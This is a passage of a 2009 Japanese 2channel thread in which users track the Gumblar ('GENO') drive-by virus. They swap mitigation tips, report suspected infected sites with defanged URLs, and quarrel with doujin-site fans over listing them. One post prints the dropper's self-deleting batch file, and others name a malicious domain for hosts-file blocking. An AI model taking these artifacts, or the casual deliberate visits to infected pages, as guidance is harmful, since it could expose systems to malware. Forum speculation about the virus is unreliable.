スリープするのは単一IPじゃなくてIP範囲なのかもしれないね。
ADSL再接続してIP変えても落ちてこないことは確かにある。
637192.168.0.774:2009/05/18(月) 05:05:41 ID:iUubSaQo0
>>631
今回のGENOはスクリーンショット撮ってないでしょ?
あとスクショはクリップボード転送禁止にすれば簡単に対策出来るんじゃない?
638192.168.0.774:2009/05/18(月) 05:06:57 ID:PGXf1oVHO
腐向け同人サイトを
ひたすら巡るしかないかなー

まとめに載ってるジャンルを。


コミケに応募したサイトとか、感染してるかも…

それかはネットでアンソロジー売ってるサイトとか

予想だけど
639192.168.0.774:2009/05/18(月) 05:07:28 ID:4oFiJRbxO
書きかけで送信しちまった。
ジャバスクリプトとアクティブコントロール切ればieやスレイプニルでも予防可能?
640192.168.0.774:2009/05/18(月) 05:08:39 ID:iUubSaQo0
>>636
それじゃ駄目か・・・
ルーターでftpポート禁止にしてるけど
通信しようとした記録があったわ
641192.168.0.774:2009/05/18(月) 05:08:48 ID:uebw+uxF0
>>638
パソコンの前に、君の脳みそが感染しそうで俺は心配です。
642192.168.0.774:2009/05/18(月) 05:09:38 ID:EAK2OqaQ0
ググるのは危険、と書いてあるからみんな情報収集しない…巧みだ…
643ひみつの文字列さん:2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
644192.168.0.774:2009/05/18(月) 05:10:57 ID:PGXf1oVHO
>>641
何かには感染してるけど
ウイルスじゃないから心配しないで
645192.168.0.774:2009/05/18(月) 05:11:15 ID:e2dzUe840
>>635
おおサンキュー。そんなのあるのか。
急がずにじっくり調べるかな。

でも良く考えたらXPシステム用(Cドライブ)と、
データ用で別ドライブにしてたわ。
クリーンインストールっていっても
Cドライブだけでいいよね?
646192.168.0.774:2009/05/18(月) 05:13:22 ID:PGXf1oVHO
マリーアントア・ネットワーク「ググるのが危険ならヤフれば良いじゃない!!」
647192.168.0.774:2009/05/18(月) 05:14:34 ID:uebw+uxF0
頼むからMSNにだけは感染しないでくれよ。
ホットメールが使えなくなるとかなりきつい。
648192.168.0.774:2009/05/18(月) 05:14:59 ID:RvJr4U680
とりあえず、引っかかった人はすぐに各機関に通報するんだ!

・JCSA(日本コンピュータセキュリティ協会) http://www.jcsa.or.jp/

・情報処理推進機構 http://www.ipa.go.jp/security/topics/newvirus/newvirus-top.html

・警察 http://www.npa.go.jp/cyber/
649192.168.0.774:2009/05/18(月) 05:19:52 ID:l7w010Wk0
>>639
>>269 もやれば暫くは安全。
ついでに Proxomitron とかで eval\s*\( を void( あたりに書き換えるようにするといい。
650 ◆f/iQdjPxCM :2009/05/18(月) 05:19:58 ID:76hdi/6T0
>>591, >>602 辺り
というわけで、ごめんミスがあって見逃してた可能性があるので、
まだ>>601等での解決をしていないようなら
>>643 で再度試してもらえますか?

まぁ、あいかわらず試作なんで、
検出されなかったからといって居ないとは限らないということでお願いします。
651192.168.0.774:2009/05/18(月) 05:24:28 ID:k2CI1leb0
>>649
>>639

>>269は例によってスペルミスがあるよ。
gumlar.cnじゃなくてgumblar.cnね。
652GENO:2009/05/18(月) 05:27:08 ID:c4TnzPSv0
>>878
人柱乙。ありがとう。
こういう情報は個人的にも助かるよ。
653192.168.0.774:2009/05/18(月) 05:28:12 ID:pcZYKxEF0
これは
654652:2009/05/18(月) 05:31:14 ID:c4TnzPSv0
スマン完全に誤爆だorz
655192.168.0.774:2009/05/18(月) 05:31:22 ID:2ybyztFx0
勇気あるな、>>638。俺なんかはもう、同人関連と関わりたくないわ。

セキュ板乗り込んで暴れ、質問に対して説明してやりゃ何故か逆切れ起こして掻き回す。
同人の板ではどうなってるかと思って見てみりゃ、私怨だか晒しだかウイルス防止よりジャンル?大事だとか言って、協力する気ゼロ。
それでいて、被害妄想だけは人一倍。

なんなんだ、あれは。



656192.168.0.774:2009/05/18(月) 05:33:18 ID:tFgIi2z+0
何だかんだ言って、拡散防止に勤める気は皆無なんだもなぁ同人は
URL踏むのが怖いからどうのこうのって、単にURLにスペース入れるなりサイト名だけにするなりすれば良いのにさ
657604:2009/05/18(月) 05:37:22 ID:mLA05Iwx0
今気付いた事だけど、ウィンドウズモバイルだから感染しないって訳じゃないと思うから、怪しいサイトをスマートフォン等で踏んだら母艦PCと同期しない方が良いと思う。

人柱報告をここのスレと同人、VIPにマルチで書いたけどセキュリティ板には書かなかった・・・
やっぱ書いたほうがいいかな?
658591:2009/05/18(月) 05:38:18 ID:e2dzUe840
>>650
さっそくやってみたけど結果は変わらなかった。
「みつけられなかったけど油断しないでください」

うちのXPは感染濃厚だけど
昼間仕事なんで今日の夜までは再インスコできないから
試作のVer.UPするならやってみるよ
659192.168.0.774:2009/05/18(月) 05:39:18 ID:uebw+uxF0
>>657
同人に書いて貴重な情報を流されるくらいなら、こっちに書いてもらうとありがたい。
情報をまとめることもできるし。
660192.168.0.774:2009/05/18(月) 05:41:30 ID:xKJ07MeN0
>>657
VIPってまともに機能してんの?
661604:2009/05/18(月) 05:43:18 ID:mLA05Iwx0
>>659

自分が出来ることはスマートフォンでの検証しかないけど、できる限り色んなとこ回ってみるわ

逐一報告します
662192.168.0.774:2009/05/18(月) 05:44:04 ID:FWzOpsLD0
663192.168.0.774:2009/05/18(月) 05:45:47 ID:PGXf1oVHO
>>655
もちろん怖いからケータイで探すよ


感染してるサイトがあれば他のサイトと比較して違いが出るかもしれないしー

あとはサイトとかで拍手レスや日記を見て
更新が途絶えてるサイトが怪しいかなーとかね

夏コミが近くなると、そういうのを毎日更新するサイトが結構あるんだなー


駄目かな、こんな捜索の仕方じゃ。
664192.168.0.774:2009/05/18(月) 05:46:27 ID:k2CI1leb0
とうとうPHPにbase64エンコードしてincludeするようになってしまったのか。
これは面倒だな。
665192.168.0.774:2009/05/18(月) 05:46:35 ID:/bqCRjF50
>>604
乙です。
検証よろしくお願いします。
666192.168.0.774:2009/05/18(月) 05:46:43 ID:FWzOpsLD0
:zC
dEl "C:\test\sample.exe"
iF EXIst "C:\test\sample.exe" goTO zC
dEL "C:\DOCUME~1\User\LOCALS~1\Temp\\e.bat"

実行したとき作られるe.batの中身はこんな感じ、ファイルを削除してる
667192.168.0.774:2009/05/18(月) 05:46:49 ID:2ybyztFx0
>>657
ありがとう。本当にありがとう。
あと、こちらへも書いて欲しい。お願い出来るかな。
668192.168.0.774:2009/05/18(月) 05:48:24 ID:uebw+uxF0
>>661
ありがとう
669192.168.0.774:2009/05/18(月) 05:55:00 ID:GfBjvcuO0
670192.168.0.774:2009/05/18(月) 05:55:04 ID:PGXf1oVHO
ところでGoogleは感染してるのかな
671192.168.0.774:2009/05/18(月) 05:57:18 ID:/KUiF8zn0
>>670
してたら新聞載る
672192.168.0.774:2009/05/18(月) 05:58:33 ID:k2CI1leb0
>>670
Googleは感染していないが、Firefoxでページの先読みを有効にしたままだと
検索結果が表示された段階でアンチウィルスが警告を出す場合がある。
673192.168.0.774:2009/05/18(月) 05:58:55 ID:wcAYThWMO
>>670
火狐の先読み機能云々と混同してないか?
674192.168.0.774:2009/05/18(月) 06:00:13 ID:2ybyztFx0
>>669
974 名前:GENO 投稿日:2009/05/18(月) 05:48:53 ID:EASrZNYM0
>>970
今回のウイルスの広がりかたはおかしいし人為的かもとか
そもそも存在してるのか?なんて言われてるくらいよく分からないウイルスなのに
サイト晒すのはなあ…
感染した本人がアドレス晒すのは全然構わないと思いますが


いまだに、こんな事言ってるような連中だから。究極の保身体質だ。
感染拡大防止より、自分達の世界の方が大事なんだろ。そんな事では、下手すると自滅するのにね。
675192.168.0.774:2009/05/18(月) 06:01:36 ID:GfBjvcuO0
存在してるのか?にお茶吹いた
676192.168.0.774:2009/05/18(月) 06:02:14 ID:PGXf1oVHO
なるほど、サンクスです。
677192.168.0.774:2009/05/18(月) 06:02:20 ID:4oFiJRbxO
>>649
行の追加てテキストにファイルをドラッグして、
ずら−とならんでる127001〜の一番下にコピぺすればいいのか?
678192.168.0.774:2009/05/18(月) 06:03:25 ID:xKJ07MeN0
>>674
もうほっといてやれよ
679604:2009/05/18(月) 06:07:26 ID:mLA05Iwx0
今うこっけいと小林製薬をスマートフォンで見てきた。
IE、オペラ共問題なし

あと感染していると思われるサイトを教えてほしいんだが、ここにURL直貼りじゃなくて、@を「あっと」に変える感じで書き込んでくれるとありがたい。
(直貼りすると踏む人が出て被害拡大するため)

とりあえず5つくらいサイト回って検証を終わりにしたいと思うので協力お願いします。

ちなみに携帯スペックは
イーモバイル
S21HT (HTC製)
ウィンドウズモバイル6.1
IEモバイルとオペラミニ9.5でトップページのみ踏む

ブラウザのオプションはデフォ
680192.168.0.774:2009/05/18(月) 06:08:44 ID:tFgIi2z+0
URIにアットマークは無いぞww
http://抜きで良いんじゃないかな
hだけ抜くと専ブラとかが補完してしまう
681192.168.0.774:2009/05/18(月) 06:11:03 ID:2ybyztFx0
682192.168.0.774:2009/05/18(月) 06:11:07 ID:PGXf1oVHO
>>679
解りやしたー


こういう時に携帯やiフォンは便利だよねw
683192.168.0.774:2009/05/18(月) 06:11:49 ID:f1LWJiL00
http:// 抜きでもリンクします
wwwを全角では?
684604:2009/05/18(月) 06:13:07 ID:mLA05Iwx0
>>680
送信した後気付いたorz

要は何も考えないでリンク踏んじゃうひとが踏まないようにしてくれればOKです。

って俺の検証って役に立つのか疑問・・・
685192.168.0.774:2009/05/18(月) 06:13:42 ID:uebw+uxF0

 . を、どっと と平仮名でかけばいいんじゃないか?
686192.168.0.774:2009/05/18(月) 06:19:13 ID:5ta7ziYM0
.を。にするとかで対応すればいいと思う
www以降でも専ブラだとリンクしちゃうし
687192.168.0.774:2009/05/18(月) 06:20:00 ID:JmCcr4Q60
URLはピリオドを■辺りに変換して貼り付けるのが安全かねぇ?
とりあえず補完されにくい文字に置き換え推奨っつーことで
688192.168.0.774:2009/05/18(月) 06:20:14 ID:tFgIi2z+0
>>683
マジで?失礼しました
スペース挟むなりすれば確実かなぁ
689192.168.0.774:2009/05/18(月) 06:25:16 ID:PGXf1oVHO
690192.168.0.774:2009/05/18(月) 06:26:54 ID:L4YY5vy4O
こうは?

www●ribbonmagic●com
691604:2009/05/18(月) 06:47:20 ID:mLA05Iwx0
>>690
分かればOKです。
ちなみに携帯では大丈夫でした。

そのサイト同人板のGENOスレにリダイレクトURL貼られててPCで踏んじゃったんだけど何故かGoogleに止められてAvast!先生は無反応だったw

火狐で設定そのままだったんだけどマジびびった
692192.168.0.774:2009/05/18(月) 06:47:48 ID:AnkkIdnX0
また落ちてくるexeのハッシュ値変わった
693192.168.0.774:2009/05/18(月) 07:01:57 ID:l7w010Wk0
>>691
今の所は大丈夫っぽい。
怪しい記述は見つからないな。
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.ribbonmagic.com
694192.168.0.774:2009/05/18(月) 07:12:50 ID:mLA05Iwx0
GENOスレ巡回してたら朝になってた。。。

というわけでしばらく仮眠とります。
検証は起きてからやります
695192.168.0.774:2009/05/18(月) 07:13:58 ID:I1cI3dKE0
悪徳商法マニアックスのサイトもやばい
696192.168.0.774:2009/05/18(月) 07:14:54 ID:zJTySDnN0
>>694
乙むりすんな
697192.168.0.774:2009/05/18(月) 07:18:00 ID:4ySopLDi0
>>691 グーグル先生は何か警告出るしな。ヤフー先生はどうかな
698ひみつの文字列さん:2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
699192.168.0.774:2009/05/18(月) 07:24:45 ID:++caYdHRO
>>693
携帯からなんだが
怪しい記載があるように
みえるんだが

っおれはサイトをこれで改竄された被害経験者なのです。
700192.168.0.774:2009/05/18(月) 07:28:20 ID:qoS+NLbF0
701192.168.0.774:2009/05/18(月) 07:29:06 ID:oK6yyyPI0
コメントアウトされてるから大丈夫だと思うけど気持ち悪いなw
コードには反応するかも
702192.168.0.774:2009/05/18(月) 07:31:37 ID:xiraJ4z90
avast!でスキャンしたら一個検出した
googleでukokkei.co.jpを検索した時の火狐のキャッシュらしい
703192.168.0.774:2009/05/18(月) 07:32:23 ID:k2CI1leb0
>>699
</HEAD>の直後にいるね。なんで残してるんだか。
704192.168.0.774:2009/05/18(月) 07:34:42 ID:4ySopLDi0
>>702 ”ukokkei.co.jp”でググったら俺もavast反応した。キャッシュだったけど。消したほうがいいな
705192.168.0.774:2009/05/18(月) 07:36:05 ID:zpCoVVcL0
>>663
PCの同人サイトは携帯ごと弾いてるところも少なくないと思う
名前が上がってる流行ジャンルのサーチからというのが
効率悪いようでいて一番早いかも知れない
706 ◆f/iQdjPxCM :2009/05/18(月) 07:36:39 ID:76hdi/6T0
>>700
さんくす。受け取りましたー。
そして、理解。修正検討しますー。
707192.168.0.774:2009/05/18(月) 07:38:06 ID:+SS0hjWTO
初音ミクとかボーカロイドの同人が物凄い数感染してるっていうのは?
708192.168.0.774:2009/05/18(月) 07:40:45 ID:/4TBD5OI0
>>702
取り合えず無防備アタックしてみた
開いてるあいだCPU使用率が100%になった
けどC:\WINDOWS\system32\sqlsodbc.chmのファイルサイズに
変更は無いからGENOではないみたいだな
709192.168.0.774:2009/05/18(月) 07:52:36 ID:4ySopLDi0
なぁavast!が反応するならもし踏んでもチェストにいれて削除できるんじゃないの
710192.168.0.774:2009/05/18(月) 07:56:48 ID:l7w010Wk0
>>699
うん、俺にも見える…。
勘違いなのか、あの時点で本当に無かったのか、俺には判んないや。
711192.168.0.774:2009/05/18(月) 08:08:11 ID:yKeLT0rF0
おはよう
今度はレポートの人とは別でスレで感染サイト探し?
で検体集め?
ちと3行くらいでまとめてくれ。サイト探しとかなら協力できるかも
712192.168.0.774:2009/05/18(月) 08:10:11 ID:KPrwLMxK0
同人板の住人です。
沢山ご迷惑おかけしてもうしわけございません。

なんのお役にもたてませんが、同人サイトが多数登録
されている個人サーチというものがございます。
そこを探せば同人サイトが沢山みつかります。

複数のサーチを探すには、サーチエンジンのリンク集という
総合サーチを探せば便利です。

これくらいしか情報提供できません。
お役にたてなくて申し訳ございませんでした。
713192.168.0.774:2009/05/18(月) 08:13:16 ID:OsK02Ge20
>>712
適当にスレつくってURLリストを放り込んでくれ
機械的にサーチするのにも手動でシコシコやってたんじゃ、感染のペースに間に合わんぞ。
714192.168.0.774:2009/05/18(月) 08:19:01 ID:OFNjMzot0
2chに個人サイトのURLが残るのが嫌なら
ALINKとかの自動リンク集でも借りて感染サイト登録、対処されたら削除で駄目なのかね
http://alink.uic.to/
715192.168.0.774:2009/05/18(月) 08:19:46 ID:4oFiJRbxO
このウイルスって携帯はセーフだそうだが、360とか、PSP、PS3は?アウト?セーフ?
716192.168.0.774:2009/05/18(月) 08:21:20 ID:iven4hyc0
【備えよ】 新型インフルエンザを語る part4
http://society6.2ch.net/test/read.cgi/hosp/1242525724/208,216
病院・医者板にあるURLにgenoウイルスに感染したサイトがある。

208 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:12:10 ID:MtaDxdjC0 (PC)
なんかこの板にあったリンク先を見てから、PCの調子が悪いんだが。
DOSプロンプトが開かないとか、windowsアップデートが正常終了しないとか。

216 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:40:12 ID:p8ujOdZK0 (PC)
>>208
もしかして小林製薬とか薬事日報社のページ見ませんでした?
それページ閲覧しただけで感染する"強毒性の新型ウィルス"ですよ。
かかったら今のところWin再インストールしかない恐ろしいウィルス。
ウィルス検査ソフトでも検出できないものが多いようです。
717192.168.0.774:2009/05/18(月) 08:25:19 ID:wWb/jJWH0
          ____
        /_ノ  ヽ、_\
 ミ ミ ミ  o゚((●)) ((●))゚o      ミ ミ ミ
/⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\   /⌒)⌒)⌒)
| / / /     |r┬-|    | (⌒)/ / / //  360とか、PSP、PS3だっておwwwwwwwwwwwwwwwwwww
| :::::::::::(⌒)    | |  |   /  ゝ  :::::::::::/    
|     ノ     | |  |   \  /  )  /
ヽ    /     `ー'´      ヽ /    /     バ
 |    |   l||l 从人 l||l      l||l 从人 l||l  バ   ン
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、    ン
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))
718192.168.0.774:2009/05/18(月) 08:26:20 ID:KPrwLMxK0
>>713
したらばなどで感染サイトを記する案もでたんですが、
どうにこうにも同人板は基本晒し厳禁なので協力者がいません。

同人独自のルールが根深くありまして、特に女性サイトは
以上に検索避けを行う風習があるくらいですから。


同人板のスレに検体を求める書き込みが多数ありましたが、
結局住人は荒らしだと決め付けてスルーに入りました。

感染が広がる同人ジャンルなのに、住人では何もしようとしません。
719192.168.0.774:2009/05/18(月) 08:26:59 ID:L4YY5vy4O
>>713
何か絶対晒したくないらしい
同人板で勝利宣言ぽいことまでしてて、かなりひいた
自サイトに来て、感染被害者出そうが
自分達の幸せの方が大事なようだ
720192.168.0.774:2009/05/18(月) 08:29:32 ID:/4TBD5OI0
>>718
そういやあそこ
何人かが変に仕切ってたな
正直ノリがかなりキモかった
721192.168.0.774:2009/05/18(月) 08:30:18 ID:tFgIi2z+0
http://genolists.alink.uic.to/
一応やってみたよ
722192.168.0.774:2009/05/18(月) 08:32:10 ID:xKJ07MeN0
>>718
進めてる事言っとけば協力する人は進んで協力してくれるのでは?
同人板でやるのが嫌ってだけでしょうし
723192.168.0.774:2009/05/18(月) 08:32:57 ID:yKeLT0rF0
>>720
むしろ全員が仕切り屋状態
でもって自意識過剰だからGENO以外にも使われるとか色んな心配してるのよ
今はオチスレの方に1件だけみたいだね
724192.168.0.774:2009/05/18(月) 08:33:36 ID:c4TnzPSv0
誤爆でバレたかもしれないけどw
同人板住人です。

ジャンルの性質上、晒しに敏感なのはわかってたけど
あそこまで狭い範囲でしか考えられない人が揃ってるとは
正直思わなかった。

ご迷惑をおかけして申し訳ないです。
725192.168.0.774:2009/05/18(月) 08:34:25 ID:r4h+PdSAO
勝利宣言してる人は単発の荒らしでつよ!とかなんたら言い出しそうですね
ごもっともですが、いちいち書かずとも解るし

VIPにまとめスレ立てようとしましたが無理でしたので、
どなたかお願いします。
726192.168.0.774:2009/05/18(月) 08:35:02 ID:yKeLT0rF0
>>722
協力したいけど他人のアドレス晒すなんて可哀相
本人から許可をとか言い出すと思う。本気で協力したいと思っててで
あと、なんだかんだいってたいして感染サイト知らないんだと思う

しかしいざ探そうとするとなかなか見つからん。
wikiのヒントだけが頼りだからなぁ
727192.168.0.774:2009/05/18(月) 08:41:45 ID:ua7Ctj4Z0
感染してみたい人は、ここよりも、SEC板のGENOスレの方がいいんじゃないかなぁ。
見ててちょっとうざくなってきた。
728192.168.0.774:2009/05/18(月) 08:42:04 ID:Uvd5wKih0
729192.168.0.774:2009/05/18(月) 08:45:48 ID:BfwGP9yG0
>>721
おお、やってくれたんだ

リボンマジックって書くだけじゃなく解説文のところにURL載せといた方が手間が少ない
730192.168.0.774:2009/05/18(月) 08:47:27 ID:yKeLT0rF0
>>721に感染サイト突っ込んでけば良いのかな?
既出分も入れるの?
731192.168.0.774:2009/05/18(月) 08:47:55 ID:zpCoVVcL0
>>721
乙です
これ、ウイルスの配布元がからっぽだから無害って話が出てたところも
登録していいの?

>>723
自意識過剰というよりは
実際に私怨晒しに使う馬鹿が同人板の中にいるからだな…
あと同人板は最近まで私怨ほかの晒しで揉めてたから
いつも以上にアレルギーが出てる
732192.168.0.774:2009/05/18(月) 08:48:22 ID:tFgIi2z+0
>>731
ジャンル分けておくわ
733192.168.0.774:2009/05/18(月) 08:51:24 ID:yKeLT0rF0
>>731
それを人は自意識過剰とか
被害妄想とか加害妄想とかって言うんですよ

同人板はおわっとるが他の板なら協力してくれるとこあるかな?
734192.168.0.774:2009/05/18(月) 08:53:24 ID:7mu1Axnz0
4月の時点から参加してて、できるかぎり協力もしてるんだけど
この週末席を外してて、スレ乱立激しくてどれが主スレかわからんくなってきた。

今まではセキュ板だったんだけど、見てみて見限った。
現状はここが主スレと考えておk?
735192.168.0.774:2009/05/18(月) 08:54:31 ID:NjPoBYuDO
同人板で聞いても誰も説明してくれなかったから敢えて聞くけど。
感染疑惑サイト集めて一覧にしてどうするんだ?
まとめにでも貼るのか?
2ch内だけであの辺感染してるから踏むなよって警告だけに使って意味あるのかとか
何がしたいか分からないのだが
736192.168.0.774:2009/05/18(月) 08:55:31 ID:GfBjvcuO0
というか私怨はすぐ外されるから大丈夫じゃないの?
大体ウィルス感染自体は悪事でもなんでもないでしょう、その後の対応をきちっとやれば良いだけで
むしろしっかりしてるなとすら思われるんじゃないの?こういう感覚はおかしいの?同人的に
737192.168.0.774:2009/05/18(月) 08:56:01 ID:zpCoVVcL0
>>733
うんまあそうだね
ただあそこは凝り固まってるけど
セキュのほうの住人を疑ってるって感じじゃない気がする
とだけ言っておきたかった

>>734
たぶん
738192.168.0.774:2009/05/18(月) 08:57:37 ID:/yFIekht0
IE系のブラウザはJavaScript切ってるだけじゃ駄目なん?
739192.168.0.774:2009/05/18(月) 08:57:40 ID:liJyExVc0
限られた集団の中の警告だけでも十分意味はあると思う。
そもそもアンチウイルスソフトだって
購入者だけ守っているような物だもん。
740ひみつの文字列さん:2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
741192.168.0.774:2009/05/18(月) 09:04:57 ID:3Wf1BgQ0O
>>736
感染を悪事と感じてる奴がいるんだなこれが
既に他所でウイルスばら蒔きやがってって騒いでるのがいた
742192.168.0.774:2009/05/18(月) 09:05:49 ID:KP5/wRB70
検体探すのなら闇雲に同人サイト探すより名前変換サイト(夢/ドリーム)探すといいと思う。
性質上名前を変換するのにJS必須だから感染確立の高さは異常。

cluster■x0.to/search/(サーチエンジンのリンク集■= . )
辺りからカテゴリ→傾向→ドリームでいくつかサーチ出てくる。
743192.168.0.774:2009/05/18(月) 09:06:10 ID:bBtWfmBn0
>>736
同人界に生息するDQNや厨をなめちゃいけません
ウィルス流行ってるから気をつけてとサイトで告知→恐がらせるなんて、ひどい!
感染してないし、対策バッチリだから特に告知なし→何も対策してないなんてひどい!
感染していたが、ちゃんと対応した→危機管理がなってない、ひどい!
と突撃を受けるような場所だよ


とにかく同人板及び同人界は特殊な場所だと頭に叩き込んで、
あっちに僅かにいるまともな人かこっちにまできてるまともな人から情報を貰った方がいい
744192.168.0.774:2009/05/18(月) 09:06:16 ID:vNF2317C0
>>734
セキュ板は見ての通りの状態だからIDの出る板へ引っ越しだね
745192.168.0.774:2009/05/18(月) 09:06:24 ID:EUa+NIiOO
URLを何のために晒すか、そのあとどうするのか
という説明一切なくただ晒せ晒せ言っても、同人板じゃなくても晒す奴いないと思うんだが……

ボーカロイドの大手、サーチ、歌ってみた系の同盟?
東方の大手(ひらがな4文字だか漢字2文字だか)
というのはどっかで見た
ジャンル者じゃないから詳細はわからないけど
746192.168.0.774:2009/05/18(月) 09:07:19 ID:ImVScTUk0
>>645
この手のベアドライブをUSB接続するキットの場合,IDEのは電源不足でほとんど使い物にならないから
気をつけてね.
IDEを接続するなら電源アダプタが別についてるHDDケースのがいいよ.
747192.168.0.774:2009/05/18(月) 09:07:19 ID:k2CI1leb0
>>735
俺個人に関しては、個別に踏みに行って検体拾ってきて、ViruslTotalに上げてみて
検出されなければ検体を↓にアップ。
【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/
と同時にできる範囲でセキュリティベンダーに検体を提出する。

また、踏みに行くことでスクリプトの変化状況もつかめるから、例えばVistaや
Chromeをターゲットにしてるのを見つけたらここに報告する。
748192.168.0.774:2009/05/18(月) 09:07:36 ID:iven4hyc0
ニコニコにGENOウィルスについて
動画があって、内容か不正確だからうpした人間が
消してしまった。結構マイりスト再生数数あったな。
749192.168.0.774:2009/05/18(月) 09:07:56 ID:PjOToSNF0
はっはっはっ
同人者だけどもう耐えられないw 何この馬鹿


280 名前:GENO 本日のレス 投稿日:2009/05/18(月) 09:03:57 Osjp9Dvs0
>>274
評判最悪もなにも……
自分達の実験動物になってくれなかったから愚痴ってるだけじゃんw

恥を知れよ。お前も。
750192.168.0.774:2009/05/18(月) 09:09:02 ID:c4TnzPSv0
>>745
この状況下でそんなこと言うの多分同人板だけだよ。
今は一つでも具体的な情報が必要とされてるのに。
751192.168.0.774:2009/05/18(月) 09:09:21 ID:SsnH/5OJP
ヲチでやれ
752192.168.0.774:2009/05/18(月) 09:09:23 ID:4ySopLDi0
>「キャッシュ消せばいいんだよ!」
って言うAAありますけど、消して良いのでしょうか
753192.168.0.774:2009/05/18(月) 09:10:10 ID:7mu1Axnz0
>>737
>>744
了解。

今日はこれから出なければいけないけど、
協力できることはできるだけします。
754192.168.0.774:2009/05/18(月) 09:10:18 ID:kqUxb44l0
毎日消せばいいんだよ
755192.168.0.774:2009/05/18(月) 09:10:54 ID:r4h+PdSAO
>>749さん、同人板からの出張乙でした。もうお前に用は無い
756192.168.0.774:2009/05/18(月) 09:11:48 ID:yKeLT0rF0
よっしゃあ。1個見っけた
ソースチェック中にブラウザ先読みでかキャッシュに入ってきてビビった
757192.168.0.774:2009/05/18(月) 09:14:20 ID:qhPHQv7V0
>>735
2chにはROMというのが書き込みの数倍おってな…
またねらーが2chでしか活動しないわけでもなく、知識は広がる

GENOだって感染してるのにテキトーぶっこいて誤魔化したから、
知らずにアクセスする人が出て感染拡大してこの有様なんだろ。
よくわからん感染してない層が今後感染する確率を減らすためにも、
感染してる危険な状態のサイトを知る機会を作ることは充分に意味があると思う。
758192.168.0.774:2009/05/18(月) 09:14:29 ID:NjPoBYuDO
747の言う事はある程度納得。
そういう具体的な説明されれば動く奴は動くと思う。
正直同人板ではこの質問オールスルーだったから荒し認定も仕方なかった
759192.168.0.774:2009/05/18(月) 09:16:48 ID:lbjdJxFz0
本家 F-Secure SAS 提出分の回答 現在のところなし。
定義ファイルも昨日から変更なし。


760192.168.0.774:2009/05/18(月) 09:21:08 ID:2hjuGSUk0
>>757
まとめサイトも見ないようなタコが君の言うようなリスト見るとでも思ってるのか?
そのリストをタコに見せたら感染者増えるだけだと思うんだけど、どう考えてる?
761192.168.0.774:2009/05/18(月) 09:22:08 ID:k2CI1leb0
>>758
答えようとしたら連投規制食らって、その後の流れ見てて相手するのが
面倒になったんだよ。
762192.168.0.774:2009/05/18(月) 09:22:35 ID:0cCnuNjQP
>>760
同人板のノリをこっちに持ち込むなよタコ
763192.168.0.774:2009/05/18(月) 09:22:40 ID:yKeLT0rF0
>>721のリンク集は使うの?
やっと1個見つけれたんだが
764192.168.0.774:2009/05/18(月) 09:23:36 ID:EUa+NIiOO
>>750
そうなのかそれはすまん
素人を理由にするなと言われるだろうが
自分も含め 知識のない人にとっては ただ晒せと言われたってわからないんだ
何に使うか説明されずに「いいから署名しろ」って言われてる感じ

何故晒す必要があるのか晒してどうするかを具体的に言われたら同人板でも理解のあるやつはいると思う
解決に役立てたいと思っているなら尚更 わかりやすく向こうでそれを説明してほしい
長文になったごめん
765192.168.0.774:2009/05/18(月) 09:24:30 ID:7S654oYT0
>>764
もうここでのやりとりが貼られてるよ
766192.168.0.774:2009/05/18(月) 09:29:30 ID:kqUxb44l0
>>760
自業自得だろw
767192.168.0.774:2009/05/18(月) 09:32:02 ID:bBtWfmBn0
>>764
同人板でやるよりも理解のある人にこっちに来て協力してもらった方がはるかに効率的だよ
あくまでも同人板ではヒントを出してくれるだけだと思ってさ
なんの手がかりもないよりかはジャンル名でも出てたら少しはマシでしょ
768192.168.0.774:2009/05/18(月) 09:32:35 ID:GfBjvcuO0
もういいから見つけたら
http://genolists.alink.uic.to/
にのせて行こうぜ、白ならすぐ消せるんだし
769192.168.0.774:2009/05/18(月) 09:33:55 ID:3Wf1BgQ0O
同人板は便乗煽りやらなんやらでてきてるから話が全く進まないな
770192.168.0.774:2009/05/18(月) 09:34:17 ID:qhPHQv7V0
>>760
テンプレも飛ばすくらいウイルスにビビってるタコとやらが、
「感染するから行くな」と直接言われてなお行くと思うその思考がわからない。
771192.168.0.774:2009/05/18(月) 09:35:45 ID:xKJ07MeN0
>>764
検体詐欺で凝り固まってるからもう何言っても無理だよ
772192.168.0.774:2009/05/18(月) 09:40:08 ID:Zt9X7rvA0
>>771
そうでもないよ
煽りが多発してるんでややこしくなってるけど
興味のある人はこちらを見に来ると思う
つか、今自分が来ました
773192.168.0.774:2009/05/18(月) 09:40:28 ID:RYc+mlfs0
>>770
載ってないから大丈夫と無防備のまま、他所で感染するところまでは想定内
774192.168.0.774:2009/05/18(月) 09:41:38 ID:yKeLT0rF0
すまん。リンク登録しようとしてるんだが
公式はともかく同人サイトも固有のサイト名?
ジャンル名?とかのがわかりやすそうな気がするんだけど
別に中身はどうでも良いから固有サイト名で良いのかな
775192.168.0.774:2009/05/18(月) 09:41:46 ID:lNiEWqwt0
今回、GENOウイルスについては何故か2chとそこから作られたまとめサイト程度しか情報が無く、
報道された事例も、4月騒動の時にGENOでウイルスが配布されたってちょいかかれた程度しかない。

亜種はともかく、初期段階で艦船に使用された脆弱性が3月修正のものなのか5月修正のものなのかもはっきりしない。

ウイルスの強度としては、どうがんばっても検知しか出来ず、駆除は不可能、回復にはシステム再インストールしかなく、
それだって挙動が不明だからそれくらいしか安心できる手段が無いっていう、nimdaとかと同等、下手すりゃそれ以上の
かなりやばいレベルのウイルスなのに、2ch以外ではほとんど話題になっていない、報道は何やってんだ。
776192.168.0.774:2009/05/18(月) 09:41:58 ID:ua7Ctj4Z0
>>752
最初に感染が確認されたGENOという通販サイトの告知が「ブラウザのキャッシュを消せ」であり
(後に、それすらもなかったことにされたが)全く効果がないものでした。それを揶揄する為に
貼られているAAですので、無視してください。

